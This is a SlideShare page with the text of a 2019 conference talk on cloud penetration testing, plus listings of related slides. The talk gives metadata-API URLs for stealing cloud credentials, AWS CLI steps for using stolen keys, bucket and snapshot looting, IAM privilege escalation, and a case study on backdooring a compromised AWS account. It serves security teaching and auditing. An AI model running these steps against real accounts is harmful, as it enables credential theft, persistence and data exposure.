SlideShare a Scribd company logo

(SACON) Anant Shrivastava - cloud pentesting

Priyanka Aash
Priyanka Aash

(SACON) Anant Shrivastava - cloud pentesting

Technology
1 of 42
Download to read offline
SACON SACON International 2019 India | Bangalore | February 15 - 16 | Taj Yeshwantpur Cloud Pentesting Anant Shrivastava NotSoSecure Regional Director APAC @anantshri
SACON 2019 • Introduction to Cloud Computing • Product Offerings by Major Vendor’s • AWS • Azure • GCP • Cloud vs Conventional Pentesting • Explore Attack Surfaces (IaaS, PaaS, SaaS, Serverless) • Exploiting Metadata API’s • Abusing cloud storage • Forensic analysis of cloud snapshots • Attacking Azure AD • Attacking Serverless • Understanding and attacking IAM Services • Various Case Studies Agenda
SACON 2019 Anant Shrivastava ● Regional Director @ NotSoSecure ● 10 yrs of corporate experience ● Speaker / Trainer : BlackHat, Nullcon, RootConf, c0c0n, RuxCon ● Contributor / reviewer : OWASP Testing Guides (Web / Mobile) ● Project Lead : Code Vigilant, Android Tamer ● https://anantshri.info ( @anantshri on social platforms) #WHOAMI
SACON 2019 This Session is highly opinionated. All thoughts are my own and not authorized or endorsed by my company or organizers. I am standing on giant’s shoulders: a lot of what I am going to talk about is public knowledge just compiled in one single place for all. This field is constantly evolving, my understanding and explanation might be wrong or convoluted if you feel a better approach is possible be ready I will need that help. Disclaimer
SACON 2019 Cloud computing could be summarized as a [decentralized] shared pool of remotely accessible resources with rapid provisioning capabilities. However the reason cloud computing makes sense for anyone is 1. Low IT hardware overheads 2. Minimal management overheads 3. Massive upfront cost saving (running cost could be higher if unoptimized) In short if done right it saves $$$$$ and that’s why people want it Introduction to Cloud Computing
SACON 2019 My understanding Ruler : AWS Challengers: Google Cloud Platform, Azure Others: IBM, Oracle, Alibaba, Digital Ocean, Heroku and many more Out of the league: OpenStack Lets understand the landscape
SACON 2019 Lets understand the landscape https://www.canalys.com/newsroom/cloud-market-share-q4-2018-and-full-year-2018
SACON 2019 What is Offered by : Amazon Web Services Entry on right side are categories not products Largest service provider Most popular / Known Offerings • EC2 • S3 • RDS • Beanstalk • CloudWatch • Route53 • IAM • Cloudfront • Lambda 50 products listed on this page : https://www.amazonaws.cn/en/products/
SACON 2019 What is offered by Azure Another Giant in terms of services offered. Individual service count goes well above 100 Most popular known offerings • Azure AD • hosted IIS Solutions • Office 365 • Team Foundation • Azure Windows VM List of all services : https://azure.microsoft.com/en-in/services/
SACON 2019 What is offered by: GCP Multitude of product offerings Most popular: • Gmail • Google Suite (Office, mail, plus more) • Google+ ( :D :D ) List of all services: https://cloud.google.com/products/
SACON 2019 What is available as part of OpenStack Self Deployed or custom deployable solution hence service count differs Opensource package has 62 different services https://www.openstack.org/software/project-navigator/openstack-components Some sample configurations are available at https://www.openstack.org/software/sample-configs
SACON 2019 Smaller players IBM : https://www.ibm.com/cloud/ A full-stack cloud platform with over 170 products and services covering data, serverless, containers, AI , IoT and blockchain. Oracle: https://cloud.oracle.com/home Focused on Enterprise section Heroku : https://www.heroku.com/products Primarily PaaS Offerings Alibaba Cloud : https://www.alibabacloud.com/product
SACON 2019 Conventional vs Cloud Pentesting • System misconfiguration vs unpatched issues • Service provider approvals • You are tenant, service provider is owner • Owner can close accounts / throttle service / block connections to safeguard itself • Targets shift • Conventional : DA / EA and you are done • Cloud: cloud admin is the new top boss • Max Damage shift • Old: AD will be gone or data stolen • New: exuberant bill, and data stolen and data destruction and GDPR + more
SACON 2019 Cloud Roles and Responsibilities Reference: https://aws.amazon.com/compliance/shared-responsibility-model/ https://blogs.msdn.microsoft.com/azuresecurity/2016/04/18/what-does-shared-responsibility-in-the-cloud-mean/
SACON 2019 Cloud Roles and Responsibilities https://medium.com/@pkerrison/pizza-as-a-service-2-0-5085cd4c365e
SACON 2019 Infrastructure as a Service • IaaS ~ VM in a server • You manage everything sitting in VM • Tenant responsibilities include • OS Updates • Middleware/Server Update • App/services updates • Secure configuration of services • Data sitting on top of the apps/services • Network communications
SACON 2019 Attack Surface : Infrastructure as a Service • All tenant responsibilities are direct attack surfaces • Application Level bugs leading to Code execution or file read • Weak credentials • Insecure configurations of cred gateways (no NLA on RDP) • Insecure Firewall Configurations
SACON 2019 Attack Surface : Infrastructure as a Service: Metadata API • Almost all cloud service providers communicate specific metadata to services via a novel method of Metadata API • A non-routable IP Address is taken and any request to it is handled by cloud provider themselves http://169.254.169.254/ • This API Provides access to plethora of information about the services themselves • Official Documentation: 1. AWS: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html 2. GCP: https://cloud.google.com/compute/docs/storing-retrieving-metadata 3. Azure: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service 4. Opendata: https://docs.openstack.org/nova/rocky/user/metadata-service.html compatible with AWS “2009-04-04” version • Metadata API is not just limited to IaaS but its common across the platforms[almost] • Like all services ever created this has its own Quirks (we will explore that in attack section)
SACON 2019 Exploring Platform as a Service and its Attack Surface • Less things to worry about compared to IaaS more then SaaS • Tenant responsibilities include • App/services updates • Secure configuration of services • Data sitting on top of the apps/services • Network communications • Attack Surface • Application flaws • Data storage permissions (exposed buckets) • Data at transit setup (TLS) • Insecure configurations as less control over upper stack • Example of PaaS: Elasticbeanstalk, app-engine, Azure (cloudservices and websites), S3
SACON 2019 Exploring: SaaS • Minimal control over anything besides data storage and access to data • Attack surface boils down to logical flaws, access and authorization issues • Back to Web Application pentesting principals • However if a bug is found Its impact can be widespread and affect multiple / all tenants • Example of simpler bugs in SaaS : Subdomain takeover issues
SACON 2019 Exploring: FaaS • Its only named serverless :P • FaaS would not manage data hence each action is atomic in nature • Function execution is generally timeboxed (few minutes to 1 sec) • Each execution could be in different environment depending on configuration
SACON 2019 Show me the action So we now have a clear understand of what each of these larger entities mean. Now lets look at ways and means to own and pwn these services We will look at: 1. How to identify our target 2. What are the exposed areas to focus on 3. Exploiting the scenario Towards the end we will talk about what could be mitigation options
SACON 2019 Understanding your environment Lets assume you got access to a system, how can you identify which service provider is in action. 1. Straight forward: Reverse IP Lookup (may not be accurate as internally they may have routed things around) 2. System commands: Linux (sudo capable) 1.sudo dmidecode -s bios-version (gives vendor name) 2.sudo dmidecode -s bios-vendor (Google for GCP)
SACON 2019 Understanding your environment Metadata API (http://169.254.169.254) 1. Azure: gives unauth error if Metadata: true is not present 2. GCP: Requires “Metadata-Flavor: Google” in all requests 3. GCP: for curl to http://metadata.google.internal we get a response with Metadata-Flavor: google 4. AWS: curl request gives a http response Note: The requirement for headers is a clever hack which blocks SSRF attacks
SACON 2019 Attacking Metadata API • SSRF or URL fetch • If you only have control over URL parameter then AWS will work • For GCP • Query /v1beta1/ Metadata-flavour: google header was enforced in v1 • For Azure header is a must hence SSRF attack might not work • Code Execution • Make curl calls directly to the metadata API Useful URL’s: • AWS • To fetch Security Credentials: http://169.254.169.254/latest/user-data/iam/security-credentials/<rolename> • GCP • Root password: http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json • Kube env: http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env More Cloud Metadata URL’s useful for SSRF Testing : https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb
SACON 2019 What next? • So we obtained Credentials, what next? $ export AWS_ACCESS_KEY_ID=AKIAI44QH8DHBEXAMPLE $ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY $ export AWS_SESSION_TOKEN=AQoDYXdzEJr...<remainder of security token> $ aws ec2 describe-instances --region us-east-1 Enumerating Permissions (nimbostratus) https://github.com/andresriancho/nimbostratus Ref: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_use-resources.html GCP http://carnal0wnage.attackresearch.com/2019/01/i-found-gcp-service-account-tokennow.html?m=1
SACON 2019 Demo • How to interact with Metadata API • How to fetch the Token • How to use AWS command line and use obtained tokens • Enumerate various privileges on the token using nimbostratus • Limitations of Nimbostratus
SACON 2019 Cloud storage • Almost all of the cloud service provider gives access to some sort of file storage on steroids • S3 by AWS does more then just file storage can also host static websites • Major Attack Surface revolve around incorrect permissions • Buckets publicly accessible • Writable by many non-required users / roles • Bruteforcable / Guessable names Tips: • To host website AWS wants bucketname == CNAME) • If you access s3.storage.com url’s you will be directed to specific region where it hosted
SACON 2019 Cloud storage: Bruteforcing Bucket names Storage enumeration is possible as names are unique in nature Automated tools • https://github.com/digininja/CloudStorageFinder (AWS, Digital Ocean) • https://blog.netspi.com/anonymously-enumerating-azure-file-resources/ (Azure) • https://github.com/NetSPI/MicroBurst (Azure) • https://github.com/appsecco/spaces-finder (Digital Ocean) • https://github.com/0xSearches/sandcastle (AWS S3)
SACON 2019 Cloud storage: Commandline • Identify List of buckets in S3 $ aws s3api list-buckets --query "Buckets[].Name" • Check if the bucket is publicaly accessible $ aws s3 ls s3://<bucketname> --no-sign-request • Action on s3 bucket $ aws s3 ls/cp/mv/rm s3://<bucketname>/file [<other_location>] • GCP Storage gsutil ls -r gs://<bucketname> • Azure Storage az storage blob list --container-name $container_name --output table
SACON 2019 Cloud storage: Demo • Access buckets via aws s3 cmd • How to check if bucket is publicly accessible • How to enumerate various bucket names
SACON 2019 Cloud Snapshots Cloud Snapshots are very very IaaS focused attack surface Consider them like a disk image copy of the cloud instance Snapshots can be retrieved and depending on the configuration attached to other VM’s. Once disk is attached to other VM we have bypassed all the logical checks on the system and should be in a position to access confidential items like • /etc/shadow • Windows SAM File • Confidential files kept on filesystem
SACON 2019 Owning Cloud Snapshots 1. Get caller id: aws sts get-caller-identity 2. Describe snapshots aws ec2 describe-snapshots --owner-id <get from get-caller- identity> 3. You can get list of every public snapshot by aws ec2 describe-snapshots –region us- east-1 4. Load snapshot in own account 1. Create a volume aws --profile YOUR_ACCOUNT ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-id 2. Attach volume to linux machine and inside linux machine run cmd to access it at /mnt sudo mount /dev/xvdb1 /mnt Ref: https://securosis.com/blog/cloud-forensics-101
SACON 2019 Azure AD Attacks • Azure AD is a hosted AD Solution allows organizations to leverage hybrid approach where two AD’s on prem and Azure AD can be in sync. Which also means if on prem is not compromised but Azure AD got owned they have all creds. • Even if you have only office 365 you are part of Azure AD and can interact via azure-cli • Assuming you have a valid cred you can get User Details : az ad user list --output=table -- query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Email:mai l,UserId:mailNickname,Enabled:accountEnabled}’ • All service principals az ad sp list --output=table -- query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisher Name,MetadataURL:samlMetadataUrl}’ https://adsecurity.org/wp-content/uploads/2017/07/2017-DEFCON-HackingTheCloud-SteereMetcalf-Final.pdf More: https://hunter2.gitbook.io/darthsidious/enumeration/azure-enumeration and https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
SACON 2019 Attacking Serverless We have created a sample webpage where we are running commands on two different serverless environments AWS and GCP. Instead of talking lets have a quick demo of how Serverless could be the start attack point and what differs where • Tips: AWS lambda doesn’t have metadata API access but does carry creds in environment variables /proc/self/environ Refer: https://www.owasp.org/images/5/5c/OWASP-Top-10-Serverless-Interpretation- en.pdf
SACON 2019 Attacking IAM Service IAM services are very core to the cloud services We have already seen various attack scenario’s leveraging roles and credentials For specific to IAM scenario’s I wanted to talk about two essential topics • Dormant Resources • Shadow Admins Dormant resources are those IAM roles and creds who were once created but are now not active or created but never used and hence never monitored or cared for. (although it applies to servers also but those have impact only on money not access) TIPS: aws sts get-session-token --duration-seconds 129600 creates a backdoor token not listed anywhere not visible in aws iam list-access-keys
SACON 2019 Shadow Admins • CreateAccessKey : create a new access key to another IAM admin account • CreateLoginProfile : The attacker can add a new password-based login profile, set a new password for that entity, impersonate it and execute the intended malicious action on behalf of the compromised user. • UpdateLoginProfile : permission to reset other IAM users’ login passwords. • AttachUserPolicy, AttachGroupPolicy or AttachRolePolicy : permissions could attach existing admin policy to any other entity • PutUserPolicy, PutGroupPolicy or PutRolePolicy : permits the attacker to add “inline” policies to other entities, The newly added inline policy defined by the attacker will allow the attacker to grant additional privileges other entities • CreatePolicy : the attacker could add a stealthy admin policy • AddUserToGroup : an attacker could add user directly into the admin group • UpdateAssumeRolePolicy : an attacker can assume permissions of a privileged account • CreatePolicyVersion, SetDefaultPolicyVersion : change a non-privileged entity to be a privileged one. • PassRole with CreateInstanceProfile/AddRoleToInstanceProfile : attacker could create a new privileged instance profile Ref: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ And https://github.com/duo-labs/cloudtracker
SACON 2019 Case study: Backdooring AWS Account Starting point: Compromised AWS credentials Exploitation Process: 1. Persist: aws sts get-session-token --duration-seconds 129600 2. Approach 1: Create user 1. aws iam create-user --user-name [my-user] 2. aws iam create-access-key --user-name [my-user] 3. Approach 2: Create just access key using 1. aws iam create-access-key --user-name [existing-user] 4. For future: Lambda function to trigger on new user creation and send you a access key 5. Approach 3: create a new role attach it to existing role 1. aws iam create-role and aws iam attach-role-policy 6. For future: lambda function to trigger on new role creation and add your backdoor 7. Failsafe: use UpdateAssumeRolePolicy trigger to read backdoors Ref: https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9
SACON 2019 Auditing Tools 1. As an authorized person take the API Key with security permissions and audit 2. As an attacker when you obtain a key run it via auditing tools to see if you can spot some easy wins. For item 1, Bunch of different options cs-suite is my fav, just run it once and get most of the common reports in one shot. But the versions might be a bit old so if you want prefer running individual scans separately also. example scout2 is older in cs-suite Reports for most of them are difficult to read for the first time. Second scenario is tricky, tools are made with assumption that all commands will work but that’s not necessarily the case. Mostly commands will fail in second case. Only tool made with that in mind seems to be nimbostratus however its pretty limited. Example it can’t find if s3 permissions are available to you.
SACON 2019 References and Tools • Amazon Web Services — a practical guide https://github.com/open-guides/og-aws • Pacu Attack framework: https://github.com/RhinoSecurityLabs/pacu • Cloud resource mapping and visualizing : https://github.com/duo-labs/cloudmapper • Practice environments • http://flaws.cloud • http://flaws2.cloud • Serverless Practice environments • https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service • http://github.com/puresec/Serverless-Goat • https://github.com/torque59/AWS-Vulnerable-Lambda • Keep your login creds safe – https://docs.aws.amazon.com/opsworks/latest/userguide/security-ssh-access.html – https://aws.amazon.com/articles/tips-for-securing-your-ec2-instance/
SACON 2019 More References and Tools • Hardening Guidelines – https://www.cisecurity.org/benchmark/amazon_web_services/ – https://www.cisecurity.org/benchmark/azure/ – https://www.cisecurity.org/benchmark/google_cloud_computing_platform/ • Cloud Account Audit's – https://github.com/SecurityFTW/cs-suite (Cross provider) – https://github.com/toniblyx/prowler (AWS) – https://github.com/cyberark/SkyArk (AWS) – https://github.com/nccgroup/Scout2 (AWS) – https://github.com/nccgroup/G-Scout (GCP) – https://github.com/nccgroup/azucar (Azure) – https://github.com/mwrlabs/Azurite (Azure) • Another Case Study: https://www.threatstack.com/cloud-attack • IaaS systems need more then just cloud level probing, perform OS level Audit's – https://github.com/lateralblast/lunar (Linux) – https://github.com/CISOfy/lynis (Linux)
SACON 2019 Thank You If you need help feel free to contact anant@anantshri.info anant@notsosecure.com

Recommended

From The Hidden Internet: Lesson From 12 Months Of Monitoring
From The Hidden Internet: Lesson From 12 Months Of MonitoringFrom The Hidden Internet: Lesson From 12 Months Of Monitoring
From The Hidden Internet: Lesson From 12 Months Of MonitoringPriyanka Aash
 
AWS November meetup Slides
AWS November meetup SlidesAWS November meetup Slides
AWS November meetup SlidesJacksonMorgan9
 
Become a Cloud Security Ninja
Become a Cloud Security NinjaBecome a Cloud Security Ninja
Become a Cloud Security NinjaAmazon Web Services
 
Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...
Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...
Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...Cyxtera Technologies
 
Defcon 27 - Phishing in the Cloud Era
Defcon 27 - Phishing in the Cloud EraDefcon 27 - Phishing in the Cloud Era
Defcon 27 - Phishing in the Cloud EraNetskope
 
Cloud Access Security Brokers - CASB
Cloud Access Security Brokers - CASB Cloud Access Security Brokers - CASB
Cloud Access Security Brokers - CASB Samrat Das
 
Defcon 27 - The Future of Command and Control
Defcon 27 - The Future of Command and ControlDefcon 27 - The Future of Command and Control
Defcon 27 - The Future of Command and ControlNetskope
 
How sdp delivers_zero_trust
How sdp delivers_zero_trustHow sdp delivers_zero_trust
How sdp delivers_zero_trustZscaler
 

Recommended

From The Hidden Internet: Lesson From 12 Months Of Monitoring
From The Hidden Internet: Lesson From 12 Months Of MonitoringFrom The Hidden Internet: Lesson From 12 Months Of Monitoring
From The Hidden Internet: Lesson From 12 Months Of MonitoringPriyanka Aash
 
AWS November meetup Slides
AWS November meetup SlidesAWS November meetup Slides
AWS November meetup SlidesJacksonMorgan9
 
Become a Cloud Security Ninja
Become a Cloud Security NinjaBecome a Cloud Security Ninja
Become a Cloud Security NinjaAmazon Web Services
 
Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...
Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...
Cyxtera - Operational Complexity: The Biggest Security Threat to Your AWS Env...Cyxtera Technologies
 
Defcon 27 - Phishing in the Cloud Era
Defcon 27 - Phishing in the Cloud EraDefcon 27 - Phishing in the Cloud Era
Defcon 27 - Phishing in the Cloud EraNetskope
 
Cloud Access Security Brokers - CASB
Cloud Access Security Brokers - CASB Cloud Access Security Brokers - CASB
Cloud Access Security Brokers - CASB Samrat Das
 
Defcon 27 - The Future of Command and Control
Defcon 27 - The Future of Command and ControlDefcon 27 - The Future of Command and Control
Defcon 27 - The Future of Command and ControlNetskope
 
How sdp delivers_zero_trust
How sdp delivers_zero_trustHow sdp delivers_zero_trust
How sdp delivers_zero_trustZscaler
 
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...Cisco DevNet
 
Phishing in the Cloud Era (BSides)
Phishing in the Cloud Era (BSides)Phishing in the Cloud Era (BSides)
Phishing in the Cloud Era (BSides)Netskope
 
How Google Protects Its Corporate Security Perimeter without Firewalls
How Google Protects Its Corporate Security Perimeter without FirewallsHow Google Protects Its Corporate Security Perimeter without Firewalls
How Google Protects Its Corporate Security Perimeter without FirewallsPriyanka Aash
 
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...CloudVillage
 
Migration to microsoft_azure_with_zscaler
Migration to microsoft_azure_with_zscalerMigration to microsoft_azure_with_zscaler
Migration to microsoft_azure_with_zscalerZscaler
 
Lacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework
 
IoT End-to-End Security Overview
IoT End-to-End Security OverviewIoT End-to-End Security Overview
IoT End-to-End Security OverviewAmazon Web Services
 
Get an office 365 expereience your users will love v8.1
Get an office 365 expereience your users will love v8.1Get an office 365 expereience your users will love v8.1
Get an office 365 expereience your users will love v8.1Zscaler
 
Cisco Security Technical Alliances
Cisco Security Technical AlliancesCisco Security Technical Alliances
Cisco Security Technical AlliancesCisco DevNet
 
Dissecting ssl threats
Dissecting ssl threatsDissecting ssl threats
Dissecting ssl threatsZscaler
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the CloudSecurity Innovation
 
Netskope Threat Labs: Cloud As an Attack Vector
Netskope Threat Labs: Cloud As an Attack VectorNetskope Threat Labs: Cloud As an Attack Vector
Netskope Threat Labs: Cloud As an Attack VectorNetskope
 
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)Amazon Web Services
 
Security Across the Cloud Native Continuum with ESG and Palo Alto Networks
Security Across the Cloud Native Continuum with ESG and Palo Alto NetworksSecurity Across the Cloud Native Continuum with ESG and Palo Alto Networks
Security Across the Cloud Native Continuum with ESG and Palo Alto NetworksDevOps.com
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Kubernetes - do or do not, there is no try
Kubernetes - do or do not, there is no tryKubernetes - do or do not, there is no try
Kubernetes - do or do not, there is no tryJames Strong
 
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...Jean-François LOMBARDO
 
Zscaler ThreatLabz dissects the latest SSL security attacks
Zscaler ThreatLabz dissects the latest SSL security attacksZscaler ThreatLabz dissects the latest SSL security attacks
Zscaler ThreatLabz dissects the latest SSL security attacksZscaler
 
Esg lab-validation-check-point-cloud guard-mar-2018
Esg lab-validation-check-point-cloud guard-mar-2018Esg lab-validation-check-point-cloud guard-mar-2018
Esg lab-validation-check-point-cloud guard-mar-2018Alejandro Daricz
 
How VPNs and Firewalls Put Your Organization at Risk
How VPNs and Firewalls Put Your Organization at RiskHow VPNs and Firewalls Put Your Organization at Risk
How VPNs and Firewalls Put Your Organization at RiskCyxtera Technologies
 
Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesUnderscore VC
 
Cloud Architecture - Multi Cloud, Edge, On-Premise
Cloud Architecture - Multi Cloud, Edge, On-PremiseCloud Architecture - Multi Cloud, Edge, On-Premise
Cloud Architecture - Multi Cloud, Edge, On-PremiseAraf Karsh Hamid
 

More Related Content

What's hot

DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...Cisco DevNet
 
Phishing in the Cloud Era (BSides)
Phishing in the Cloud Era (BSides)Phishing in the Cloud Era (BSides)
Phishing in the Cloud Era (BSides)Netskope
 
How Google Protects Its Corporate Security Perimeter without Firewalls
How Google Protects Its Corporate Security Perimeter without FirewallsHow Google Protects Its Corporate Security Perimeter without Firewalls
How Google Protects Its Corporate Security Perimeter without FirewallsPriyanka Aash
 
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...CloudVillage
 
Migration to microsoft_azure_with_zscaler
Migration to microsoft_azure_with_zscalerMigration to microsoft_azure_with_zscaler
Migration to microsoft_azure_with_zscalerZscaler
 
Lacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework
 
IoT End-to-End Security Overview
IoT End-to-End Security OverviewIoT End-to-End Security Overview
IoT End-to-End Security OverviewAmazon Web Services
 
Get an office 365 expereience your users will love v8.1
Get an office 365 expereience your users will love v8.1Get an office 365 expereience your users will love v8.1
Get an office 365 expereience your users will love v8.1Zscaler
 
Cisco Security Technical Alliances
Cisco Security Technical AlliancesCisco Security Technical Alliances
Cisco Security Technical AlliancesCisco DevNet
 
Dissecting ssl threats
Dissecting ssl threatsDissecting ssl threats
Dissecting ssl threatsZscaler
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the CloudSecurity Innovation
 
Netskope Threat Labs: Cloud As an Attack Vector
Netskope Threat Labs: Cloud As an Attack VectorNetskope Threat Labs: Cloud As an Attack Vector
Netskope Threat Labs: Cloud As an Attack VectorNetskope
 
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)Amazon Web Services
 
Security Across the Cloud Native Continuum with ESG and Palo Alto Networks
Security Across the Cloud Native Continuum with ESG and Palo Alto NetworksSecurity Across the Cloud Native Continuum with ESG and Palo Alto Networks
Security Across the Cloud Native Continuum with ESG and Palo Alto NetworksDevOps.com
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Kubernetes - do or do not, there is no try
Kubernetes - do or do not, there is no tryKubernetes - do or do not, there is no try
Kubernetes - do or do not, there is no tryJames Strong
 
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...Jean-François LOMBARDO
 
Zscaler ThreatLabz dissects the latest SSL security attacks
Zscaler ThreatLabz dissects the latest SSL security attacksZscaler ThreatLabz dissects the latest SSL security attacks
Zscaler ThreatLabz dissects the latest SSL security attacksZscaler
 
Esg lab-validation-check-point-cloud guard-mar-2018
Esg lab-validation-check-point-cloud guard-mar-2018Esg lab-validation-check-point-cloud guard-mar-2018
Esg lab-validation-check-point-cloud guard-mar-2018Alejandro Daricz
 
How VPNs and Firewalls Put Your Organization at Risk
How VPNs and Firewalls Put Your Organization at RiskHow VPNs and Firewalls Put Your Organization at Risk
How VPNs and Firewalls Put Your Organization at RiskCyxtera Technologies
 

What's hot (20)

DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
DEVNET-1123 CSTA - Cisco Security Technical Alliances, New Program for Ecosys...
 
Phishing in the Cloud Era (BSides)
Phishing in the Cloud Era (BSides)Phishing in the Cloud Era (BSides)
Phishing in the Cloud Era (BSides)
 
How Google Protects Its Corporate Security Perimeter without Firewalls
How Google Protects Its Corporate Security Perimeter without FirewallsHow Google Protects Its Corporate Security Perimeter without Firewalls
How Google Protects Its Corporate Security Perimeter without Firewalls
 
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
ATT&CKing the Sentinel – deploying a threat hunting capability on Azure Senti...
 
Migration to microsoft_azure_with_zscaler
Migration to microsoft_azure_with_zscalerMigration to microsoft_azure_with_zscaler
Migration to microsoft_azure_with_zscaler
 
Lacework AWS Security Week Presentation
Lacework AWS Security Week PresentationLacework AWS Security Week Presentation
Lacework AWS Security Week Presentation
 
IoT End-to-End Security Overview
IoT End-to-End Security OverviewIoT End-to-End Security Overview
IoT End-to-End Security Overview
 
Get an office 365 expereience your users will love v8.1
Get an office 365 expereience your users will love v8.1Get an office 365 expereience your users will love v8.1
Get an office 365 expereience your users will love v8.1
 
Cisco Security Technical Alliances
Cisco Security Technical AlliancesCisco Security Technical Alliances
Cisco Security Technical Alliances
 
Dissecting ssl threats
Dissecting ssl threatsDissecting ssl threats
Dissecting ssl threats
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the Cloud
 
Netskope Threat Labs: Cloud As an Attack Vector
Netskope Threat Labs: Cloud As an Attack VectorNetskope Threat Labs: Cloud As an Attack Vector
Netskope Threat Labs: Cloud As an Attack Vector
 
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
AWS re:Invent 2016: IoT Security: The New Frontiers (IOT302)
 
Security Across the Cloud Native Continuum with ESG and Palo Alto Networks
Security Across the Cloud Native Continuum with ESG and Palo Alto NetworksSecurity Across the Cloud Native Continuum with ESG and Palo Alto Networks
Security Across the Cloud Native Continuum with ESG and Palo Alto Networks
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Kubernetes - do or do not, there is no try
Kubernetes - do or do not, there is no tryKubernetes - do or do not, there is no try
Kubernetes - do or do not, there is no try
 
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
Session 2017 CASB: the Swiss army knife that wants to be a magic wand - en re...
 
Zscaler ThreatLabz dissects the latest SSL security attacks
Zscaler ThreatLabz dissects the latest SSL security attacksZscaler ThreatLabz dissects the latest SSL security attacks
Zscaler ThreatLabz dissects the latest SSL security attacks
 
Esg lab-validation-check-point-cloud guard-mar-2018
Esg lab-validation-check-point-cloud guard-mar-2018Esg lab-validation-check-point-cloud guard-mar-2018
Esg lab-validation-check-point-cloud guard-mar-2018
 
How VPNs and Firewalls Put Your Organization at Risk
How VPNs and Firewalls Put Your Organization at RiskHow VPNs and Firewalls Put Your Organization at Risk
How VPNs and Firewalls Put Your Organization at Risk
 

